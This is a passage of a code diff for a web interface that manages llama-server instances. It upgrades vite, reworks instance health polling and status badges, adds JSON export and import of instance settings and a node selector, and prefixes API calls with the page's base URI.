@@ -264,7 +256,7 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
},
}
err := validation.ValidateInstanceOptions(options)
err := options.ValidateInstanceOptions()
if err != nil {
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
}

View File

@@ -43,7 +43,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.1.5",
"vite": "^7.1.11",
"vitest": "^3.2.4"
}
},
@@ -7424,9 +7424,9 @@
}
},
"node_modules/vite": {
"version": "7.1.5",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.1.5.tgz",
"integrity": "sha512-4cKBO9wR75r0BeIWWWId9XK9Lj6La5X846Zw9dFfzMRw38IlTk2iCcUt6hsyiDRcPidc55ZParFYDXi0nXOeLQ==",
"version": "7.1.11",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.1.11.tgz",
"integrity": "sha512-uzcxnSDVjAopEUjljkWh8EIrg6tlzrjFUfMcR1EVsRDGwf/ccef0qQPRyOrROwhrTDaApueq+ja+KLPlzR/zdg==",
"license": "MIT",
"dependencies": {
"esbuild": "^0.25.0",

View File

@@ -52,7 +52,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.1.5",
"vite": "^7.1.11",
"vitest": "^3.2.4"
}
}

View File

@@ -12,12 +12,14 @@ import { AuthProvider } from '@/contexts/AuthContext'
vi.mock('@/lib/api', () => ({
instancesApi: {
list: vi.fn(),
get: vi.fn(),
create: vi.fn(),
update: vi.fn(),
start: vi.fn(),
stop: vi.fn(),
restart: vi.fn(),
delete: vi.fn(),
getHealth: vi.fn(),
},
serverApi: {
getHelp: vi.fn(),
@@ -30,9 +32,21 @@ vi.mock('@/lib/api', () => ({
vi.mock('@/lib/healthService', () => ({
healthService: {
subscribe: vi.fn(() => () => {}),
checkHealth: vi.fn(),
refreshHealth: vi.fn(() => Promise.resolve()),
checkHealthAfterOperation: vi.fn(),
performHealthCheck: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
},
checkHealth: vi.fn(),
checkHealth: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
}))
function renderApp() {

View File

@@ -12,13 +12,13 @@ interface BackendFormFieldProps {
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
const config = basicBackendFieldsConfig[fieldKey] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey as string, newValue)
onChange(fieldKey, newValue)
}
const renderField = () => {

View File

@@ -2,7 +2,7 @@
import React from "react";
import { Badge } from "@/components/ui/badge";
import type { HealthStatus } from "@/types/instance";
import { CheckCircle, Loader2, XCircle } from "lucide-react";
import { CheckCircle, Loader2, XCircle, Clock } from "lucide-react";
interface HealthBadgeProps {
health?: HealthStatus;
@@ -10,37 +10,37 @@ interface HealthBadgeProps {
const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
if (!health) {
health = {
status: "unknown", // Default to unknown if not provided
lastChecked: new Date(), // Default to current date
message: undefined, // No message by default
};
return null;
}
const getIcon = () => {
switch (health.status) {
case "ok":
switch (health.state) {
case "ready":
return <CheckCircle className="h-3 w-3" />;
case "loading":
case "starting":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "error":
return <XCircle className="h-3 w-3" />;
case "unknown":
case "restarting":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "shutting_down":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "stopped":
return <Clock className="h-3 w-3" />;
case "failed":
return <XCircle className="h-3 w-3" />;
}
};
const getVariant = () => {
switch (health.status) {
case "ok":
switch (health.state) {
case "ready":
return "default";
case "loading":
case "starting":
return "outline";
case "error":
return "destructive";
case "unknown":
case "restarting":
return "outline";
case "shutting_down":
return "outline";
case "stopped":
return "secondary";
case "failed":
return "destructive";
@@ -48,15 +48,17 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
};
const getText = () => {
switch (health.status) {
case "ok":
switch (health.state) {
case "ready":
return "Ready";
case "loading":
return "Loading";
case "error":
return "Error";
case "unknown":
return "Unknown";
case "starting":
return "Starting";
case "restarting":
return "Restarting";
case "shutting_down":
return "Shutting Down";
case "stopped":
return "Stopped";
case "failed":
return "Failed";
}
@@ -66,10 +68,11 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
<Badge
variant={getVariant()}
className={`flex items-center gap-1.5 ${
health.status === "ok"
health.state === "ready"
? "bg-green-100 text-green-800 border-green-200 dark:bg-green-900 dark:text-green-200 dark:border-green-800"
: ""
}`}
title={health.error || `Source: ${health.source}`}
>
{getIcon()}
<span className="text-xs">{getText()}</span>

View File

@@ -2,12 +2,13 @@
import { Button } from "@/components/ui/button";
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
import type { Instance } from "@/types/instance";
import { Edit, FileText, Play, Square, Trash2, MoreHorizontal } from "lucide-react";
import { Edit, FileText, Play, Square, Trash2, MoreHorizontal, Download } from "lucide-react";
import LogsDialog from "@/components/LogDialog";
import HealthBadge from "@/components/HealthBadge";
import BackendBadge from "@/components/BackendBadge";
import { useState } from "react";
import { useInstanceHealth } from "@/hooks/useInstanceHealth";
import { instancesApi } from "@/lib/api";
interface InstanceCardProps {
instance: Instance;
@@ -52,6 +53,40 @@ function InstanceCard({
setIsLogsOpen(true);
};
const handleExport = () => {
void (async () => {
try {
// Fetch the most up-to-date instance data from the backend
const instanceData = await instancesApi.get(instance.name);
// Remove docker_enabled as it's a computed field, not persisted to disk
// eslint-disable-next-line @typescript-eslint/no-unused-vars
const { docker_enabled, ...persistedData } = instanceData;
// Convert to JSON string with pretty formatting (matching backend format)
const jsonString = JSON.stringify(persistedData, null, 2);
// Create a blob and download link
const blob = new Blob([jsonString], { type: "application/json" });
const url = URL.createObjectURL(blob);
const link = document.createElement("a");
link.href = url;
link.download = `${instance.name}.json`;
// Trigger download
document.body.appendChild(link);
link.click();
// Cleanup
document.body.removeChild(link);
URL.revokeObjectURL(url);
} catch (error) {
console.error("Failed to export instance:", error);
alert(`Failed to export instance: ${error instanceof Error ? error.message : "Unknown error"}`);
}
})();
};
const running = instance.status === "running";
return (
@@ -131,6 +166,18 @@ function InstanceCard({
Logs
</Button>
<Button
size="sm"
variant="outline"
onClick={handleExport}
title="Export instance"
data-testid="export-instance-button"
className="flex-1"
>
<Download className="h-4 w-4 mr-1" />
Export
</Button>
<Button
size="sm"
variant="destructive"

View File

@@ -1,4 +1,4 @@
import React, { useState, useEffect } from "react";
import React, { useState, useEffect, useRef } from "react";
import { Button } from "@/components/ui/button";
import {
Dialog,
@@ -9,9 +9,11 @@ import {
DialogTitle,
} from "@/components/ui/dialog";
import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import type { BackendOptions } from "@/schemas/instanceOptions";
import ParseCommandDialog from "@/components/ParseCommandDialog";
import InstanceSettingsCard from "@/components/instance/InstanceSettingsCard";
import BackendConfigurationCard from "@/components/instance/BackendConfigurationCard";
import { Upload } from "lucide-react";
interface InstanceDialogProps {
open: boolean;
@@ -32,6 +34,7 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
const [formData, setFormData] = useState<CreateInstanceOptions>({});
const [nameError, setNameError] = useState("");
const [showParseDialog, setShowParseDialog] = useState(false);
const fileInputRef = useRef<HTMLInputElement>(null);
// Reset form when dialog opens/closes or when instance changes
@@ -54,31 +57,31 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
}
}, [open, instance]);
const handleFieldChange = (key: keyof CreateInstanceOptions, value: any) => {
const handleFieldChange = (key: keyof CreateInstanceOptions, value: unknown) => {
setFormData((prev) => {
// If backend_type is changing, clear backend_options
if (key === 'backend_type' && prev.backend_type !== value) {
return {
...prev,
[key]: value,
backend_type: value as CreateInstanceOptions['backend_type'],
backend_options: {}, // Clear backend options when backend type changes
};
}
return {
...prev,
[key]: value,
};
} as CreateInstanceOptions;
});
};
const handleBackendFieldChange = (key: string, value: any) => {
const handleBackendFieldChange = (key: string, value: unknown) => {
setFormData((prev) => ({
...prev,
backend_options: {
...prev.backend_options,
[key]: value,
} as any,
} as BackendOptions,
}));
};
@@ -104,11 +107,13 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
}
// Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {};
const cleanOptions: CreateInstanceOptions = {} as CreateInstanceOptions;
Object.entries(formData).forEach(([key, value]) => {
if (key === 'backend_options' && value && typeof value === 'object') {
const typedKey = key as keyof CreateInstanceOptions;
if (key === 'backend_options' && value && typeof value === 'object' && !Array.isArray(value)) {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
const cleanBackendOptions: Record<string, unknown> = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
@@ -118,17 +123,21 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
(cleanOptions as Record<string, unknown>)[typedKey] = cleanBackendOptions as BackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays
} else if (value !== undefined && value !== null) {
// Skip empty strings
if (typeof value === 'string' && value.trim() === "") {
return;
}
// Skip empty arrays
if (Array.isArray(value) && value.length === 0) {
return;
}
(cleanOptions as any)[key] = value;
(cleanOptions as Record<string, unknown>)[typedKey] = value;
}
});
@@ -149,6 +158,49 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
setShowParseDialog(false);
};
const handleImportFile = () => {
fileInputRef.current?.click();
};
const handleFileChange = (event: React.ChangeEvent<HTMLInputElement>) => {
const file = event.target.files?.[0];
if (!file) return;
const reader = new FileReader();
reader.onload = (e) => {
try {
const content = e.target?.result as string;
const importedData = JSON.parse(content) as { name?: string; options?: CreateInstanceOptions };
// Validate that it's an instance export
if (!importedData.name || !importedData.options) {
alert('Invalid instance file: Missing required fields (name, options)');
return;
}
// Set the instance name (only for new instances, not editing)
if (!isEditing && typeof importedData.name === 'string') {
handleNameChange(importedData.name);
}
// Populate all the options from the imported file
if (importedData.options) {
setFormData(prev => ({
...prev,
...importedData.options,
}));
}
// Reset the file input
event.target.value = '';
} catch (error) {
console.error('Failed to parse instance file:', error);
alert(`Failed to parse instance file: ${error instanceof Error ? error.message : 'Invalid JSON'}`);
}
};
reader.readAsText(file);
};
// Save button label logic
let saveButtonLabel = "Create Instance";
@@ -164,14 +216,38 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
<Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col">
<DialogHeader>
<DialogTitle>
{isEditing ? "Edit Instance" : "Create New Instance"}
</DialogTitle>
<DialogDescription>
{isEditing
? "Modify the instance configuration below."
: "Configure your new llama-server instance below."}
</DialogDescription>
<div className="flex items-center justify-between">
<div className="flex-1">
<DialogTitle>
{isEditing ? "Edit Instance" : "Create New Instance"}
</DialogTitle>
<DialogDescription>
{isEditing
? "Modify the instance configuration below."
: "Configure your new llama-server instance below."}
</DialogDescription>
</div>
{!isEditing && (
<Button
type="button"
variant="ghost"
size="sm"
onClick={handleImportFile}
title="Import instance configuration from JSON file"
className="ml-2"
>
<Upload className="h-4 w-4 mr-2" />
Import
</Button>
)}
</div>
<input
ref={fileInputRef}
type="file"
accept=".json"
onChange={handleFileChange}
className="hidden"
/>
</DialogHeader>
<div className="flex-1 overflow-y-auto">

View File

@@ -56,9 +56,9 @@ function InstanceList({ editInstance }: InstanceListProps) {
<MemoizedInstanceCard
key={instance.name}
instance={instance}
startInstance={startInstance}
stopInstance={stopInstance}
deleteInstance={deleteInstance}
startInstance={() => { void startInstance(instance.name) }}
stopInstance={() => { void stopInstance(instance.name) }}
deleteInstance={() => { void deleteInstance(instance.name) }}
editInstance={editInstance}
/>
))}

View File

@@ -54,7 +54,7 @@ const ParseCommandDialog: React.FC<ParseCommandDialogProps> = ({
options = await backendsApi.vllm.parseCommand(command);
break;
default:
throw new Error(`Unsupported backend type: ${backendType}`);
throw new Error(`Unsupported backend type: ${String(backendType)}`);
}
onParsed(options);

View File

@@ -2,12 +2,16 @@ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { type Instance, BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({
useInstanceHealth: vi.fn(() => ({ status: 'ok', lastChecked: new Date() }))
useInstanceHealth: vi.fn(() => ({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
}))
}))
describe('InstanceCard - Instance Actions and State', () => {

View File

@@ -12,12 +12,14 @@ import { AuthProvider } from '@/contexts/AuthContext'
vi.mock('@/lib/api', () => ({
instancesApi: {
list: vi.fn(),
get: vi.fn(),
create: vi.fn(),
update: vi.fn(),
start: vi.fn(),
stop: vi.fn(),
restart: vi.fn(),
delete: vi.fn(),
getHealth: vi.fn(),
}
}))
@@ -25,9 +27,21 @@ vi.mock('@/lib/api', () => ({
vi.mock('@/lib/healthService', () => ({
healthService: {
subscribe: vi.fn(() => () => {}),
checkHealth: vi.fn(),
refreshHealth: vi.fn(() => Promise.resolve()),
checkHealthAfterOperation: vi.fn(),
performHealthCheck: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
},
checkHealth: vi.fn(),
checkHealth: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
}))
function renderInstanceList(editInstance = vi.fn()) {

View File

@@ -1,4 +1,4 @@
import React from 'react'
import React, { useState, useEffect } from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
import { Label } from '@/components/ui/label'
@@ -7,6 +7,8 @@ import AutoRestartConfiguration from '@/components/instance/AutoRestartConfigura
import NumberInput from '@/components/form/NumberInput'
import CheckboxInput from '@/components/form/CheckboxInput'
import EnvironmentVariablesInput from '@/components/form/EnvironmentVariablesInput'
import SelectInput from '@/components/form/SelectInput'
import { nodesApi, type NodesMap } from '@/lib/api'
interface InstanceSettingsCardProps {
instanceName: string
@@ -25,6 +27,46 @@ const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
onNameChange,
onChange
}) => {
const [nodes, setNodes] = useState<NodesMap>({})
const [loadingNodes, setLoadingNodes] = useState(true)
useEffect(() => {
const fetchNodes = async () => {
try {
const fetchedNodes = await nodesApi.list()
setNodes(fetchedNodes)
// Auto-select first node if none selected
const nodeNames = Object.keys(fetchedNodes)
if (nodeNames.length > 0 && (!formData.nodes || formData.nodes.length === 0)) {
onChange('nodes', [nodeNames[0]])
}
} catch (error) {
console.error('Failed to fetch nodes:', error)
} finally {
setLoadingNodes(false)
}
}
void fetchNodes()
// eslint-disable-next-line react-hooks/exhaustive-deps
}, [])
const nodeOptions = Object.keys(nodes).map(nodeName => ({
value: nodeName,
label: nodeName
}))
const handleNodeChange = (value: string | undefined) => {
if (value) {
onChange('nodes', [value])
} else {
onChange('nodes', undefined)
}
}
const selectedNode = formData.nodes && formData.nodes.length > 0 ? formData.nodes[0] : ''
return (
<Card>
<CardHeader>
@@ -50,6 +92,19 @@ const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
</p>
</div>
{/* Node Selection */}
{!loadingNodes && Object.keys(nodes).length > 0 && (
<SelectInput
id="node"
label="Node"
value={selectedNode}
onChange={handleNodeChange}
options={nodeOptions}
description={isEditing ? "Node cannot be changed after instance creation" : "Select the node where the instance will run"}
disabled={isEditing}
/>
)}
{/* Auto Restart Configuration */}
<AutoRestartConfiguration
formData={formData}

View File

@@ -1,4 +1,4 @@
import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
import { type ReactNode, createContext, useCallback, useContext, useEffect, useState } from 'react'
interface AuthContextState {
isAuthenticated: boolean
@@ -62,7 +62,7 @@ export const AuthProvider = ({ children }: AuthProviderProps) => {
// Validate API key by making a test request
const validateApiKey = async (key: string): Promise<boolean> => {
try {
const response = await fetch('/api/v1/instances', {
const response = await fetch(document.baseURI + 'api/v1/instances', {
headers: {
'Authorization': `Bearer ${key}`,
'Content-Type': 'application/json'

View File

@@ -2,6 +2,7 @@ import { type ReactNode, createContext, useContext, useState, useEffect, useCall
import type { CreateInstanceOptions, Instance } from '@/types/instance'
import { instancesApi } from '@/lib/api'
import { useAuth } from '@/contexts/AuthContext'
import { healthService } from '@/lib/healthService'
interface InstancesContextState {
instances: Instance[]
@@ -115,6 +116,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
// Trigger health check after starting
healthService.checkHealthAfterOperation(name, 'start')
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to start instance')
}
@@ -127,6 +131,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
// Update only this instance's status
updateInstanceInMap(name, { status: "stopped" })
// Trigger health check after stopping
healthService.checkHealthAfterOperation(name, 'stop')
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to stop instance')
}
@@ -139,6 +146,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
// Trigger health check after restarting
healthService.checkHealthAfterOperation(name, 'restart')
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to restart instance')
}

View File

@@ -11,15 +11,38 @@ import { AuthProvider } from "../AuthContext";
vi.mock("@/lib/api", () => ({
instancesApi: {
list: vi.fn(),
get: vi.fn(),
create: vi.fn(),
update: vi.fn(),
start: vi.fn(),
stop: vi.fn(),
restart: vi.fn(),
delete: vi.fn(),
getHealth: vi.fn(),
},
}));
// Mock health service
vi.mock("@/lib/healthService", () => ({
healthService: {
subscribe: vi.fn(() => () => {}),
refreshHealth: vi.fn(() => Promise.resolve()),
checkHealthAfterOperation: vi.fn(),
performHealthCheck: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
},
checkHealth: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
}));
// Test component to access context
function TestComponent() {
const {

View File

@@ -7,24 +7,23 @@ export function useInstanceHealth(instanceName: string, instanceStatus: Instance
const [health, setHealth] = useState<HealthStatus | undefined>()
useEffect(() => {
if (instanceStatus === "stopped") {
setHealth({ status: "unknown", lastChecked: new Date() })
return
}
if (instanceStatus === "failed") {
setHealth({ status: instanceStatus, lastChecked: new Date() })
return
}
// Subscribe to health updates for this instance
const unsubscribe = healthService.subscribe(instanceName, (healthStatus) => {
setHealth(healthStatus)
})
// Cleanup subscription on unmount or when instanceStatus changes
// Cleanup subscription on unmount or when instance changes
return unsubscribe
}, [instanceName])
// Trigger health check when instance status changes to active states
useEffect(() => {
if (instanceStatus === 'running' || instanceStatus === 'restarting' || instanceStatus === 'shutting_down') {
healthService.refreshHealth(instanceName).catch(error => {
console.error(`Failed to refresh health for ${instanceName}:`, error)
})
}
}, [instanceName, instanceStatus])
return health
}
}

View File

@@ -1,5 +1,5 @@
import { describe, it, expect, vi, beforeEach } from 'vitest'
import { instancesApi } from '@/lib/api'
import { beforeEach, describe, expect, it, vi } from 'vitest'
// Mock fetch globally
const mockFetch = vi.fn()
@@ -11,11 +11,13 @@ describe('API Error Handling', () => {
})
it('converts HTTP errors to meaningful messages', async () => {
mockFetch.mockResolvedValue({
const mockResponse = {
ok: false,
status: 409,
text: () => Promise.resolve('Instance already exists')
})
text: () => Promise.resolve('Instance already exists'),
clone: function() { return this }
}
mockFetch.mockResolvedValue(mockResponse)
await expect(instancesApi.create('existing', {}))
.rejects
@@ -23,11 +25,13 @@ describe('API Error Handling', () => {
})
it('handles empty error responses gracefully', async () => {
mockFetch.mockResolvedValue({
const mockResponse = {
ok: false,
status: 500,
text: () => Promise.resolve('')
})
text: () => Promise.resolve(''),
clone: function() { return this }
}
mockFetch.mockResolvedValue(mockResponse)
await expect(instancesApi.list())
.rejects
@@ -53,7 +57,9 @@ describe('API Error Handling', () => {
await instancesApi.getLogs('test-instance', 100)
expect(mockFetch).toHaveBeenCalledWith(
'/api/v1/instances/test-instance/logs?lines=100',
expect.stringMatching(
/^https?:\/\/[^/]+\/api\/v1\/instances\/test-instance\/logs\?lines=100$/
),
expect.any(Object)
)
})

View File

@@ -1,7 +1,10 @@
import type { CreateInstanceOptions, Instance } from "@/types/instance";
import { handleApiError } from "./errorUtils";
const API_BASE = "/api/v1";
// Adding baseURI as a prefix to support being served behind a subpath
// e.g. when llmamctl's `/` is served behind a reverse proxy at `/proxy/...`
// the baseURI will be `/proxy/` and the API calls will be made to `/proxy/api/v1/<endpoint>`
export const API_BASE = document.baseURI + "api/v1";
// Base API call function with error handling
async function apiCall<T>(
@@ -46,11 +49,8 @@ async function apiCall<T>(
} else {
// Handle empty responses for JSON endpoints
const contentLength = response.headers.get('content-length');
if (contentLength === '0' || contentLength === null) {
const text = await response.text();
if (text.trim() === '') {
return {} as T; // Return empty object for empty JSON responses
}
if (contentLength === '0') {
return {} as T; // Return empty object for empty JSON responses
}
const data = await response.json() as T;
return data;
@@ -103,58 +103,74 @@ export const backendsApi = {
},
};
// Node API types
export interface NodeResponse {
address: string;
}
export type NodesMap = Record<string, NodeResponse>;
// Node API functions
export const nodesApi = {
// GET /nodes - returns map of node name to NodeResponse
list: () => apiCall<NodesMap>("/nodes"),
// GET /nodes/{name}
get: (name: string) => apiCall<NodeResponse>(`/nodes/${encodeURIComponent(name)}`),
};
// Instance API functions
export const instancesApi = {
// GET /instances
list: () => apiCall<Instance[]>("/instances"),
// GET /instances/{name}
get: (name: string) => apiCall<Instance>(`/instances/${name}`),
get: (name: string) => apiCall<Instance>(`/instances/${encodeURIComponent(name)}`),
// POST /instances/{name}
create: (name: string, options: CreateInstanceOptions) =>
apiCall<Instance>(`/instances/${name}`, {
apiCall<Instance>(`/instances/${encodeURIComponent(name)}`, {
method: "POST",
body: JSON.stringify(options),
}),
// PUT /instances/{name}
update: (name: string, options: CreateInstanceOptions) =>
apiCall<Instance>(`/instances/${name}`, {
apiCall<Instance>(`/instances/${encodeURIComponent(name)}`, {
method: "PUT",
body: JSON.stringify(options),
}),
// DELETE /instances/{name}
delete: (name: string) =>
apiCall<void>(`/instances/${name}`, {
apiCall<void>(`/instances/${encodeURIComponent(name)}`, {
method: "DELETE",
}),
// POST /instances/{name}/start
start: (name: string) =>
apiCall<Instance>(`/instances/${name}/start`, {
apiCall<Instance>(`/instances/${encodeURIComponent(name)}/start`, {
method: "POST",
}),
// POST /instances/{name}/stop
stop: (name: string) =>
apiCall<Instance>(`/instances/${name}/stop`, {
apiCall<Instance>(`/instances/${encodeURIComponent(name)}/stop`, {
method: "POST",
}),
// POST /instances/{name}/restart
restart: (name: string) =>
apiCall<Instance>(`/instances/${name}/restart`, {
apiCall<Instance>(`/instances/${encodeURIComponent(name)}/restart`, {
method: "POST",
}),
// GET /instances/{name}/logs
getLogs: (name: string, lines?: number) => {
const params = lines ? `?lines=${lines}` : "";
return apiCall<string>(`/instances/${name}/logs${params}`, {}, "text");
return apiCall<string>(`/instances/${encodeURIComponent(name)}/logs${params}`, {}, "text");
},
// GET /instances/{name}/proxy/health
getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${name}/proxy/health`),
getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${encodeURIComponent(name)}/proxy/health`),
};

View File

@@ -26,7 +26,8 @@ export async function handleApiError(response: Response): Promise<void> {
}
if (!response.ok) {
const errorMessage = await parseErrorResponse(response)
// Clone the response before reading to avoid consuming the body stream
const errorMessage = await parseErrorResponse(response.clone())
throw new Error(errorMessage)
}
}

View File

@@ -1,51 +1,161 @@
import { type HealthStatus } from '@/types/instance'
import { type HealthStatus, type InstanceStatus, type HealthState } from '@/types/instance'
import { instancesApi } from '@/lib/api'
type HealthCallback = (health: HealthStatus) => void
// Polling intervals based on health state (in milliseconds)
const POLLING_INTERVALS: Record<HealthState, number> = {
'starting': 5000, // 5 seconds - frequent during startup
'restarting': 5000, // 5 seconds - restart in progress
'shutting_down': 3000, // 3 seconds - monitor shutdown progress
'ready': 60000, // 60 seconds - stable state
'stopped': 0, // No polling
'failed': 0, // No polling
}
class HealthService {
private intervals: Map<string, NodeJS.Timeout> = new Map()
private callbacks: Map<string, Set<HealthCallback>> = new Map()
private lastHealthState: Map<string, HealthState> = new Map()
private healthCache: Map<string, { health: HealthStatus; timestamp: number }> = new Map()
private readonly CACHE_TTL = 2000 // 2 seconds cache
/**
* Performs a two-tier health check:
* 1. Get instance status from backend (authoritative)
* 2. If running, perform HTTP health check
*/
async performHealthCheck(instanceName: string): Promise<HealthStatus> {
// Check cache first
const cached = this.healthCache.get(instanceName)
if (cached && Date.now() - cached.timestamp < this.CACHE_TTL) {
return cached.health
}
async checkHealth(instanceName: string): Promise<HealthStatus> {
try {
await instancesApi.getHealth(instanceName)
return {
status: 'ok',
lastChecked: new Date()
}
} catch (error) {
if (error instanceof Error) {
// Check if it's a 503 (service unavailable - loading)
if (error.message.includes('503')) {
return {
status: 'loading',
message: 'Instance is starting up',
lastChecked: new Date()
// Step 1: Get instance details (includes status)
const instance = await instancesApi.get(instanceName)
// Step 2: If running, attempt HTTP health check
if (instance.status === 'running') {
try {
await instancesApi.getHealth(instanceName)
// HTTP health check succeeded - instance is ready
const health: HealthStatus = {
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
}
this.updateCache(instanceName, health)
return health
} catch (httpError) {
// HTTP health check failed - instance is still starting
// Any error (503, connection refused, timeout, etc.) means "starting"
const health: HealthStatus = {
state: 'starting',
instanceStatus: 'running',
lastChecked: new Date(),
error: httpError instanceof Error ? httpError.message : 'Health check failed',
source: 'http'
}
this.updateCache(instanceName, health)
return health
}
return {
status: 'error',
message: error.message,
lastChecked: new Date()
} else {
// Instance not running - map backend status directly
const health: HealthStatus = {
state: this.mapStatusToHealthState(instance.status),
instanceStatus: instance.status,
lastChecked: new Date(),
source: 'backend'
}
this.updateCache(instanceName, health)
return health
}
return {
status: 'error',
message: 'Unknown error',
lastChecked: new Date()
}
} catch (error) {
// Failed to get instance status from backend
// This is a backend communication error, not an instance health error
// Let the error propagate so polling can retry
console.error(`Failed to get instance status for ${instanceName}:`, error)
throw error
}
}
/**
* Maps backend instance status to health state
*/
private mapStatusToHealthState(status: InstanceStatus): HealthState {
switch (status) {
case 'stopped': return 'stopped'
case 'running': return 'starting' // Should not happen as we check HTTP for running
case 'failed': return 'failed'
case 'restarting': return 'restarting'
case 'shutting_down': return 'shutting_down'
}
}
/**
* Updates health cache
*/
private updateCache(instanceName: string, health: HealthStatus): void {
this.healthCache.set(instanceName, {
health,
timestamp: Date.now()
})
}
/**
* Manually refresh health for an instance
*/
async refreshHealth(instanceName: string): Promise<void> {
// Invalidate cache
this.healthCache.delete(instanceName)
try {
const health = await this.performHealthCheck(instanceName)
this.notifyCallbacks(instanceName, health)
// Update last state and adjust polling interval if needed
const previousState = this.lastHealthState.get(instanceName)
this.lastHealthState.set(instanceName, health.state)
if (previousState !== health.state) {
this.adjustPollingInterval(instanceName, health.state)
}
} catch (error) {
// Error getting health - keep polling if active
console.error(`Failed to refresh health for ${instanceName}:`, error)
}
}
/**
* Trigger health check after instance operation
*/
checkHealthAfterOperation(instanceName: string, operation: 'start' | 'stop' | 'restart'): void {
// Invalidate cache immediately
this.healthCache.delete(instanceName)
// Perform immediate health check
this.refreshHealth(instanceName).catch(error => {
console.error(`Failed to check health after ${operation}:`, error)
})
}
/**
* Subscribe to health updates for an instance
*/
subscribe(instanceName: string, callback: HealthCallback): () => void {
if (!this.callbacks.has(instanceName)) {
this.callbacks.set(instanceName, new Set())
}
this.callbacks.get(instanceName)!.add(callback)
// Start health checking if this is the first subscriber
@@ -58,36 +168,76 @@ class HealthService {
const callbacks = this.callbacks.get(instanceName)
if (callbacks) {
callbacks.delete(callback)
// Stop health checking if no more subscribers
if (callbacks.size === 0) {
this.stopHealthCheck(instanceName)
this.callbacks.delete(instanceName)
this.lastHealthState.delete(instanceName)
this.healthCache.delete(instanceName)
}
}
}
}
/**
* Start health checking for an instance
*/
private startHealthCheck(instanceName: string): void {
if (this.intervals.has(instanceName)) {
return // Already checking
}
// Initial check with delay
setTimeout(async () => {
const health = await this.checkHealth(instanceName)
this.notifyCallbacks(instanceName, health)
// Start periodic checks
const interval = setInterval(async () => {
const health = await this.checkHealth(instanceName)
this.notifyCallbacks(instanceName, health)
}, 60000)
this.intervals.set(instanceName, interval)
}, 5000)
// Initial check immediately
this.refreshHealth(instanceName).then(() => {
const currentState = this.lastHealthState.get(instanceName)
if (currentState) {
this.adjustPollingInterval(instanceName, currentState)
}
}).catch(error => {
